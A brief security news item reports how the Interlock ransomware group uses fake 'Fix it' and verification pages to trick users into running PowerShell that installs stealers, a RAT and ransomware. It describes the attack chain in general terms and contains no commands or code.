The Interlock ransomware group has adopted ClickFix-style attacks that trick users into running malicious PowerShell commands under the guise of fixing errors or verifying identity.
These social engineering tactics, active since January 2025, involve fake websites imitating Microsoft and Advanced IP Scanner, luring victims into downloading a deceptive IT tool.
When the "Fix it" button is clicked, a malicious PowerShell command is copied to the clipboard; if run, it installs a 36MB PyInstaller payload disguised as legitimate software.
This payload quietly gathers system details, maintains persistence via the Windows Registry, and installs various malware including LummaStealer, BerserkStealer, keyloggers, and Interlock’s custom RAT. Once inside, attackers use stolen credentials and remote access tools like PuTTY and AnyDesk for lateral movement.
Exfiltrated data is sent to attacker-controlled Azure Blobs before ransomware deployment, which is set to trigger daily via scheduled tasks.
Interlock’s ransom notes now emphasize legal risks to pressure victims. Researchers warn that ClickFix tactics are being used not only by Interlock but also by other ransomware groups and even North Korean actors like Lazarus.
Read more...